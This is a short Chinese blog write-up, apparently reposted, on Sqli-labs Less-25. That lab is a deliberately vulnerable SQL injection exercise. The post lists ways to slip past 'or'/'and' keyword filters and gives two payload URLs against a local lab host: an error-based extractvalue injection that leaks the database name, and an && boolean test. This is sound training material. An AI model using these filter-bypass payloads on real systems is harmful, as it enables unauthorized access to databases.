首页 > 数据库技术 > 详细

Sqli-labs less 25

时间:2016-08-12 01:13:06      阅读:212      评论:0      收藏:0      [点我收藏+]

Less-25

本关主要为or and过滤,如何绕过or和and过滤。一般性提供以下几种思路:

  1. 大小写变形 Or,OR,oR
  2. 编码,hex,urlencode
  3. 添加注释/*or*/
  4. 利用符号 and=&& or=||

    暂时只想到这些,还有的话可以补充。

    本关利用方法(4)进行。

    报错注入 or示例

    http://127.0.0.1/sqllib/Less-25/index.php?id=1‘|| extractvalue(1,concat(0x7e,database()))--+

    技术分享

    And 示例

    http://127.0.0.1/sqllib/Less-25/index.php?id=1&&1=1--+

Sqli-labs less 25

原文:http://www.cnblogs.com/lcamry/p/5763002.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!